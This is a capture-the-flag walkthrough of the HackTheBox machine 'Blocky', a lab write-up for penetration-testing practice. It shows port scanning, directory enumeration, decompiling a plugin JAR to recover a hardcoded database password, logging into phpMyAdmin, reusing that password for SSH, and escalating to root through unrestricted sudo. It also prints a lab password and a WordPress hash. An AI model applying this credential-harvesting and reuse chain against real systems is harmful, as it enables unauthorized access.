HackTheBox - Blocky

Updated 29-03-2026

A retro Linux box running a Minecraft-themed WordPress site — a forgotten plugin file hiding in plain sight contains the keys to the whole machine.

Recon

Nmap

$ ip=10.129.17.214; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-28 03:34 -0400
Nmap scan report for 10.129.17.214
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.59 seconds

Four ports of interest:

  • 21/tcp — FTP, open but unversioned
  • 22/tcp — OpenSSH 7.2p2
  • 80/tcp — Apache 2.4.18 redirecting to blocky.htb
  • 25565/tcp — Minecraft 1.11.2 server

Foothold

Hosts File

$ echo '10.129.17.214 blocky.htb' | sudo tee -a /etc/hosts

WordPress Fingerprinting

The site is a WordPress blog. whatweb confirms the version:

$ whatweb http://blocky.htb                                                                  
http://blocky.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.17.214], JQuery[1.12.4], MetaGenerator[WordPress 4.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[BlockyCraft – Under Construction!], UncommonHeaders[link], WordPress[4.8]

Directory Enumeration

$ ffuf -c -u http://blocky.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt                  

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://blocky.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 52227, Words: 3306, Lines: 314, Duration: 599ms]
.htpasswd [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 3631ms]
.htaccess [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 4596ms]
.hta [Status: 403, Size: 289, Words: 22, Lines: 12, Duration: 4598ms]
index.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 230ms]
javascript [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 127ms]
phpmyadmin [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 136ms]
plugins [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 155ms]
server-status [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 128ms]
wiki [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 137ms]
wp-admin [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 127ms]
wp-content [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 135ms]
wp-includes [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 206ms]
xmlrpc.php [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 474ms]
:: Progress: [4614/4614] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:30] :: Errors: 0 ::

The plugins/ directory is publicly accessible and contains BlockyCore.jar — a compiled Minecraft plugin.

JAR Decompilation — Hardcoded Credentials

Download and extract the JAR:

$ unzip BlockyCore.jar
Archive: BlockyCore.jar
inflating: META-INF/MANIFEST.MF
inflating: com/myfirstplugin/BlockyCore.class

Decompile the bytecode with jadx:

$ sudo jadx /home/kali/Downloads/com/myfirstplugin/BlockyCore.class -d /home/kali/Downloads/com/myfirstplugin/output 
INFO - loading ...
INFO - processing ...
INFO - done

The decompiled source exposes hardcoded SQL credentials:

$ cat BlockyCore.java 
package com.myfirstplugin;

/* JADX INFO: loaded from: BlockyCore.class */
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

<--SNIP-->

phpMyAdmin — WordPress User Discovery

The phpmyadmin directory found during enumeration is accessible. Logging in with root:8YsqfCTnvxAUeduzjNSXe22 works and reveals the wordpress database. The wp_users table exposes one account:

Notch:$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/

The hash uses WordPress’s MD5-based format. Cracking it with rockyou.txt fails, but the SQL password itself turns out to be reused for SSH.

SSH Access

$ ssh notch@blocky.htb            
The authenticity of host 'blocky.htb (10.129.17.214)' can't be established.
ED25519 key fingerprint is: SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
notch@blocky.htb's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul 8 07:24:50 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$

The user flag is accessible from here.

Privilege Escalation

Unrestricted Sudo

notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL

notch can run any command as root. Escalate directly:

notch@Blocky:~$ sudo bash -p
root@Blocky:~#